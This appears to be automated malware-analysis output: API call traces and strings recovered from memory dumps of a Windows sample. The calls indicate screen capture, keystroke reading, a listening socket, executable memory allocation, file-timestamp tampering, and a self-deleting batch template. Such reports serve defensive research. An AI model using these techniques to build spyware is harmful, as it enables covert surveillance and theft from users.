LeaveCriticalSection.KERNEL32(?,?,00000002), ref: 00C34021

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

WaitForSingleObject.KERNEL32(?,-001B7740), ref: 00C34046
LeaveCriticalSection.KERNEL32 ref: 00C3405C

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C33906, Relevance: 13.6, APIs: 6, Strings: 1, Instructions: 326

APIs

Part of subcall function 00C45594: GetSystemTime.KERNEL32(?), ref: 00C455BA
Part of subcall function 00C45594: Sleep.KERNEL32(000005DC), ref: 00C455D3
Part of subcall function 00C45594: WaitForSingleObject.KERNEL32(?,000005DC), ref: 00C455DC

Part of subcall function 00C2ECBD: memcmp.MSVCRT ref: 00C2ED1A
Part of subcall function 00C2ECBD: memcpy.MSVCRT ref: 00C2ED5A

Part of subcall function 00C44BA2: memcpy.MSVCRT ref: 00C44BB2

Part of subcall function 00C2EE09: memset.MSVCRT ref: 00C2EE1C
Part of subcall function 00C2EE09: memcpy.MSVCRT ref: 00C2EE37
Part of subcall function 00C2EE09: memcpy.MSVCRT ref: 00C2EE5F
Part of subcall function 00C2EE09: memcpy.MSVCRT ref: 00C2EE83

memset.MSVCRT ref: 00C339D5

Part of subcall function 00C2CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CD70
Part of subcall function 00C2CD5A: memcpy.MSVCRT ref: 00C2CDCD
Part of subcall function 00C2CD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1,?,00000002), ref: 00C2CDDD
Part of subcall function 00C2CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00C2CE11
Part of subcall function 00C2CD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CE9F

Part of subcall function 00C2F1A8: EnterCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1B8
Part of subcall function 00C2F1A8: LeaveCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1E2

memcpy.MSVCRT ref: 00C33A30

Part of subcall function 00C2CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C2CEB9

memcmp.MSVCRT ref: 00C33AAB

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

memcpy.MSVCRT ref: 00C33AFF

Part of subcall function 00C2F0E1: memcmp.MSVCRT ref: 00C2F0FD

Part of subcall function 00C2F1EF: memcmp.MSVCRT ref: 00C2F1FB

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

Part of subcall function 00C323F1: memcpy.MSVCRT ref: 00C32409

EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00C33BD2
LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00C33BF0

Part of subcall function 00C2EEA9: memcpy.MSVCRT ref: 00C2EED2

Part of subcall function 00C2EDAE: memcpy.MSVCRT ref: 00C2EDF9

Part of subcall function 00C2F040: memcmp.MSVCRT ref: 00C2F0B6

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C5E360: _errno.MSVCRT ref: 00C5E37B
Part of subcall function 00C5E360: _errno.MSVCRT ref: 00C5E3AD

Strings

2, xrefs: 00C33B51

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3043B, Relevance: 12.6, APIs: 7, Instructions: 173

APIs

memset.MSVCRT ref: 00C304EB
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C304FC
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00C30530
memset.MSVCRT ref: 00C30570
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C30581
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00C305C1
memset.MSVCRT ref: 00C3062C

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C35150, Relevance: 12.5, APIs: 7, Instructions: 72

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 00C35160
GetTokenInformation.ADVAPI32(00000001,00000019,00000000,00000000,?), ref: 00C35179
GetLastError.KERNEL32(?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C35183

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

GetTokenInformation.ADVAPI32(00000001,00000019,?,?,?), ref: 00C351AE
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C351BA
GetSidSubAuthority.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C351D1

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CloseHandle.KERNEL32(00000001), ref: 00C351FD

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C53382, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172

APIs

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 00C533A6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 00C533F2

Part of subcall function 00C52EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,00C2FD6D,?,00000004,00007530,?,?,?,?), ref: 00C52ED9
Part of subcall function 00C52EA3: WSASetLastError.WS2_32(?), ref: 00C52F21

WSAGetLastError.WS2_32(?,00000800,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 00C534D2
shutdown.WS2_32(?,00000001), ref: 00C534FD
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00C53526

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

WSASetLastError.WS2_32(0000274C,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?,00002710), ref: 00C5357A

Strings

, xrefs: 00C534E3

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2DFE6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115

APIs

EnterCriticalSection.KERNEL32 ref: 00C2E010
LeaveCriticalSection.KERNEL32 ref: 00C2E0C0

Part of subcall function 00C34085: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00C34097
Part of subcall function 00C34085: GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 00C340AF
Part of subcall function 00C34085: CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C340EE
Part of subcall function 00C34085: CreateCompatibleDC.GDI32 ref: 00C340FF
Part of subcall function 00C34085: LoadCursorW.USER32(00000000,00007F00), ref: 00C34115
Part of subcall function 00C34085: GetIconInfo.USER32(?,?), ref: 00C34129
Part of subcall function 00C34085: GetCursorPos.USER32(?), ref: 00C34138
Part of subcall function 00C34085: GetDeviceCaps.GDI32(?,00000008), ref: 00C3414F
Part of subcall function 00C34085: GetDeviceCaps.GDI32(?,0000000A), ref: 00C34158
Part of subcall function 00C34085: CreateCompatibleBitmap.GDI32(?,?), ref: 00C34164
Part of subcall function 00C34085: SelectObject.GDI32 ref: 00C34172
Part of subcall function 00C34085: BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00C34193
Part of subcall function 00C34085: DrawIcon.USER32(?,?,?,?), ref: 00C341C5
Part of subcall function 00C34085: SelectObject.GDI32(?,00000008), ref: 00C341E1
Part of subcall function 00C34085: DeleteObject.GDI32 ref: 00C341E8
Part of subcall function 00C34085: DeleteDC.GDI32 ref: 00C341EF
Part of subcall function 00C34085: DeleteDC.GDI32 ref: 00C341F6
Part of subcall function 00C34085: FreeLibrary.KERNEL32(?), ref: 00C34206
Part of subcall function 00C34085: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00C3421C
Part of subcall function 00C34085: FreeLibrary.KERNEL32(?), ref: 00C34230

GetTickCount.KERNEL32 ref: 00C2E06A
GetCurrentProcessId.KERNEL32 ref: 00C2E071

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

GetKeyboardState.USER32(?), ref: 00C2E0DC
ToUnicode.USER32(?,?,?,?,00000009,00000000), ref: 00C2E0FF

Part of subcall function 00C2DE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,00C2E138,?,?,?,?,?,00000009,00000000), ref: 00C2DE7E
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DEEF
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF13
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF2A
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF4A
Part of subcall function 00C2DE64: LeaveCriticalSection.KERNEL32 ref: 00C2DF65

Strings

, xrefs: 00C2E11D

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2B28A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94

APIs

memset.MSVCRT ref: 00C2B29B
GlobalMemoryStatusEx.KERNEL32(?), ref: 00C2B2B2
GetNativeSystemInfo.KERNEL32(?), ref: 00C2B2E3

Part of subcall function 00C40D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00C40D60

GetSystemMetrics.USER32(0000004F), ref: 00C2B370

Part of subcall function 00C40FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00C4BD4B,?), ref: 00C40FF2

Part of subcall function 00C40D19: RegFlushKey.ADVAPI32 ref: 00C40D29
Part of subcall function 00C40D19: RegCloseKey.ADVAPI32 ref: 00C40D31

GetSystemMetrics.USER32(00000050), ref: 00C2B363
GetSystemMetrics.USER32(0000004E), ref: 00C2B36A

Strings

@, xrefs: 00C2B2AB

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4B9D8, Relevance: 12.3, APIs: 5, Strings: 1, Instructions: 91

APIs

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

PathIsDirectoryW.SHLWAPI(?), ref: 00C4BA0E
CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 00C4BA30

Part of subcall function 00C4B883: memcpy.MSVCRT ref: 00C4B9B6

GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 00C4BA76

Part of subcall function 00C2E717: memcpy.MSVCRT ref: 00C2E775
Part of subcall function 00C2E717: memcpy.MSVCRT ref: 00C2E78A
Part of subcall function 00C2E717: memcpy.MSVCRT ref: 00C2E79F
Part of subcall function 00C2E717: memcpy.MSVCRT ref: 00C2E7AE
Part of subcall function 00C2E717: SetFileTime.KERNEL32(?,?,?,?), ref: 00C2E813

CloseHandle.KERNEL32 ref: 00C4BA95
PathRemoveFileSpecW.SHLWAPI ref: 00C4BAA2

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C4B9DE

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C44ED1, Relevance: 12.3, APIs: 4, Strings: 2, Instructions: 60

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00C44EE5
PathUnquoteSpacesW.SHLWAPI(?), ref: 00C44F4A
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00C44F59
LocalFree.KERNEL32(00000001), ref: 00C44F6D

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s, xrefs: 00C44EFC
ProfileImagePath, xrefs: 00C44F26

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2AB81, Relevance: 12.1, APIs: 8, Instructions: 147

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 00C2ABB8
GetCommandLineW.KERNEL32 ref: 00C2ABD9

Part of subcall function 00C54333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C5435D
Part of subcall function 00C54333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000), ref: 00C54392

GetUserNameExW.SECUR32(00000002,?), ref: 00C2AC11
GetProcessTimes.KERNEL32(000000FF,?,?,?,?), ref: 00C2AC47
GetUserDefaultUILanguage.KERNEL32 ref: 00C2ACB9
memcpy.MSVCRT ref: 00C2ACED
memcpy.MSVCRT ref: 00C2AD02
memcpy.MSVCRT ref: 00C2AD18

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2FFC2, Relevance: 12.1, APIs: 8, Instructions: 120

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00C323DE,?,?,?,00000000), ref: 00C2FFCE
WaitForSingleObject.KERNEL32(?,00000000), ref: 00C30009
CloseHandle.KERNEL32 ref: 00C3001C

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

memcpy.MSVCRT ref: 00C3003F
memset.MSVCRT ref: 00C30059
memcpy.MSVCRT ref: 00C3009F
memset.MSVCRT ref: 00C300BD

Part of subcall function 00C35B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35B48
Part of subcall function 00C35B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C35B6C
Part of subcall function 00C35B40: CloseHandle.KERNEL32 ref: 00C35B7C
Part of subcall function 00C35B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35BAC

Part of subcall function 00C35BB5: EnterCriticalSection.KERNEL32(00F421E4,00F421D8,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35BBE
Part of subcall function 00C35BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C35BF7
Part of subcall function 00C35BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,00C3E48F,00000000,00000000,00000002), ref: 00C35C16
Part of subcall function 00C35BB5: GetLastError.KERNEL32(?,000000FF,00C3E48F,00000000,00000000,00000002,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001), ref: 00C35C20
Part of subcall function 00C35BB5: TerminateThread.KERNEL32 ref: 00C35C28
Part of subcall function 00C35BB5: CloseHandle.KERNEL32 ref: 00C35C2F
Part of subcall function 00C35BB5: LeaveCriticalSection.KERNEL32(00F421E4,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35C44
Part of subcall function 00C35BB5: ResumeThread.KERNEL32 ref: 00C35C5D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00C323DE,?,?,?,00000000), ref: 00C30111

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0352004E, Relevance: 12.1, APIs: 8, Instructions: 61

APIs

InterlockedDecrement.KERNEL32(0351F70B), ref: 03520068
InterlockedDecrement.KERNEL32(0351F7BB), ref: 03520075
InterlockedDecrement.KERNEL32(0351F7C3), ref: 03520082
InterlockedDecrement.KERNEL32(0351F7BF), ref: 0352008F
InterlockedDecrement.KERNEL32(0351F7CB), ref: 0352009C
InterlockedDecrement.KERNEL32 ref: 035200B8
InterlockedDecrement.KERNEL32(0351F75F), ref: 035200C8
InterlockedDecrement.KERNEL32(0351F72B), ref: 035200DE

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C2E35B, Relevance: 11.3, APIs: 6, Instructions: 129

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00C2E376
PathAddBackslashW.SHLWAPI(?), ref: 00C2E3A0

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

CreateDirectoryW.KERNEL32(?), ref: 00C2E457
SetFileAttributesW.KERNEL32(?), ref: 00C2E468
CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00C2E481
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00C2E492

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C309C2, Relevance: 11.1, APIs: 5, Instructions: 210

APIs

GetCurrentThreadId.KERNEL32 ref: 00C309D3

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

Part of subcall function 00C3043B: memset.MSVCRT ref: 00C304EB
Part of subcall function 00C3043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C304FC
Part of subcall function 00C3043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00C30530
Part of subcall function 00C3043B: memset.MSVCRT ref: 00C30570
Part of subcall function 00C3043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C30581
Part of subcall function 00C3043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00C305C1
Part of subcall function 00C3043B: memset.MSVCRT ref: 00C3062C

Part of subcall function 00C29BA9: SetLastError.KERNEL32(0000000D), ref: 00C29BE4

memcpy.MSVCRT ref: 00C30B42
memset.MSVCRT ref: 00C30BA8
VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00C30BBD
GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00C30BC7

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C30643: memset.MSVCRT ref: 00C30654

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C36240, Relevance: 11.0, APIs: 6, Instructions: 115

APIs

lstrlenA.KERNEL32(?,?), ref: 00C36279
CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C362D1
GetLastError.KERNEL32(?,?,?,?), ref: 00C362E1
CloseHandle.KERNEL32 ref: 00C362EF

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

memcpy.MSVCRT ref: 00C36319
memcpy.MSVCRT ref: 00C3632D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C35406: CreateThread.KERNEL32(00000000,00000000,00C554A0,?), ref: 00C35417
Part of subcall function 00C35406: CloseHandle.KERNEL32 ref: 00C35422

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C31B16, Relevance: 10.9, APIs: 6, Instructions: 65

APIs

CreateFileW.KERNEL32(00F41EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C31B2F
GetFileSizeEx.KERNEL32(?,?), ref: 00C31B42
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00C31B68
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C31B80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31B9E
CloseHandle.KERNEL32 ref: 00C31BA7

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4BBA1, Relevance: 10.9, APIs: 6, Instructions: 57

APIs

Part of subcall function 00C44214: EnterCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C4422E
Part of subcall function 00C44214: LeaveCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C44261
Part of subcall function 00C44214: CoTaskMemFree.OLE32(00000000), ref: 00C442F6
Part of subcall function 00C44214: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44303
Part of subcall function 00C44214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00C4431A

PathRemoveBackslashW.SHLWAPI ref: 00C4BBCD
PathRemoveFileSpecW.SHLWAPI ref: 00C4BBDA
PathAddBackslashW.SHLWAPI ref: 00C4BBEB
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 00C4BBFE
CLSIDFromString.OLE32(?,00C62DB4,?,?,00000064,?,?,?,?,?,00000064,?,00C62DB4,?,?,00000000), ref: 00C4BC1A
memset.MSVCRT ref: 00C4BC2C

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C36D02, Relevance: 10.9, APIs: 6, Instructions: 39

APIs

socket.WS2_32(?,00000001,00000006), ref: 00C36D0E
bind.WS2_32 ref: 00C36D2B
listen.WS2_32(?,00000001), ref: 00C36D38
WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,00C515FC,?,?,?), ref: 00C36D42
closesocket.WS2_32 ref: 00C36D4B
WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,00C515FC,?,?,?), ref: 00C36D52

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C30C35, Relevance: 10.9, APIs: 6, Instructions: 197

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00C30C9B
memcpy.MSVCRT ref: 00C30CB5
VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00C30CC8
memset.MSVCRT ref: 00C30D1F
memcpy.MSVCRT ref: 00C30D33
VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00C30E22

Part of subcall function 00C31149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31158

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4FA0A, Relevance: 10.8, APIs: 6, Instructions: 161

APIs

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FB0C

Part of subcall function 00C4FE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,00C4FB19,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FE4D
Part of subcall function 00C4FE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,00C4FB19,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FE84

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,00C2D004,00000000), ref: 00C4FB4D
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C4FB5C
SetEvent.KERNEL32 ref: 00C4FB6C
GetExitCodeThread.KERNEL32(?,?), ref: 00C4FB80
CloseHandle.KERNEL32 ref: 00C4FB96

Part of subcall function 00C35BB5: EnterCriticalSection.KERNEL32(00F421E4,00F421D8,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35BBE
Part of subcall function 00C35BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C35BF7
Part of subcall function 00C35BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,00C3E48F,00000000,00000000,00000002), ref: 00C35C16
Part of subcall function 00C35BB5: GetLastError.KERNEL32(?,000000FF,00C3E48F,00000000,00000000,00000002,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001), ref: 00C35C20
Part of subcall function 00C35BB5: TerminateThread.KERNEL32 ref: 00C35C28
Part of subcall function 00C35BB5: CloseHandle.KERNEL32 ref: 00C35C2F
Part of subcall function 00C35BB5: LeaveCriticalSection.KERNEL32(00F421E4,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35C44
Part of subcall function 00C35BB5: ResumeThread.KERNEL32 ref: 00C35C5D

Part of subcall function 00C501B2: memcmp.MSVCRT ref: 00C501CB
Part of subcall function 00C501B2: memcmp.MSVCRT ref: 00C50227
Part of subcall function 00C501B2: memcmp.MSVCRT ref: 00C5028D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C44CA0: memcpy.MSVCRT ref: 00C44CC6
Part of subcall function 00C44CA0: memset.MSVCRT ref: 00C44D69

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2A150, Relevance: 10.8, APIs: 7, Instructions: 122

APIs

memcpy.MSVCRT ref: 00C2A18C
memcpy.MSVCRT ref: 00C2A1A1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 00C2A1D3
memcpy.MSVCRT ref: 00C2A209
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 00C2A239
memcpy.MSVCRT ref: 00C2A26F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 00C2A29F

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C52D0B, Relevance: 10.7, APIs: 6, Instructions: 64

APIs

accept.WS2_32(?,0000EA60), ref: 00C52D2C
WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00C52D3E

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00C2D163), ref: 00C52D95

Part of subcall function 00C52917: WSACreateEvent.WS2_32(00000000,?,00C52C15,?,00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C5292D
